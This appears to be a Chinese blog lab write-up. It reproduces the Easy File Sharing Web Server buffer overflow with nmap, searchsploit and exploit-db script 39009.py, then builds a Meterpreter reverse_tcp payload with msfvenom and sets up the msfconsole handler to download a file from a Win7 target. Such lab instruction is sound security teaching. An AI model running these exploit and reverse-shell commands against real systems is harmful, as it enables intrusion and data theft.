Easy File Sharing Web Server漏洞复现任务和Metasploit应用

发布时间:2023年12月29日

实验环境:

????????????????win7靶机,kali

? ? ? ? ? ? ??一? Easy File Sharing Web Server漏洞复现任务

首先在win7的靶机上配置好Easy File Sharing Web Server,打开之后如下图

直接点击Try it!进去之后点击start开始运行

接着到kali上使用nmap进行扫描,发现ip为192.168.23.130的主机存活

接着使用nmap -sV 192.168.23.132对靶机进行扫描(这里是132的原因是我重启了一下靶机ip地址发生了改变),此时发现80端口的服务版本是Easy File Sharing Web Server

接着使用searchsploit easy file sharing命令查找该服务中的渗透模块

这里使用的是HEAD Request Buffer Overflow漏洞(缓冲区溢出漏洞),查看该漏洞的路径,使用python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 目标ip 80进行攻击

接着回到靶机,发现计算器被打开了,并且Easy File Sharing Web Server停止工作,复现完毕。

二??Metasploit应用

在kali中输入命令msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.23.128 lport=5000 -f exe -o /home/kali/Desktop/payload.exe,在kali本地桌面生成一个payload,

接着将payload放到靶机上

接着使用msfconsole打开metasploit控制端,设置参数

set payload windows/meterpreter/reverse_tcp

set lhost 攻击者的ip

set lport 5000

exploit

靶机双击payload文件后,就可以在metasploit上使用命令

尝试将桌面上1.txt的文件下载下来

可以看到文件已经被下到kali中了

文章来源:https://blog.csdn.net/hjhwdwdw/article/details/135224319
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。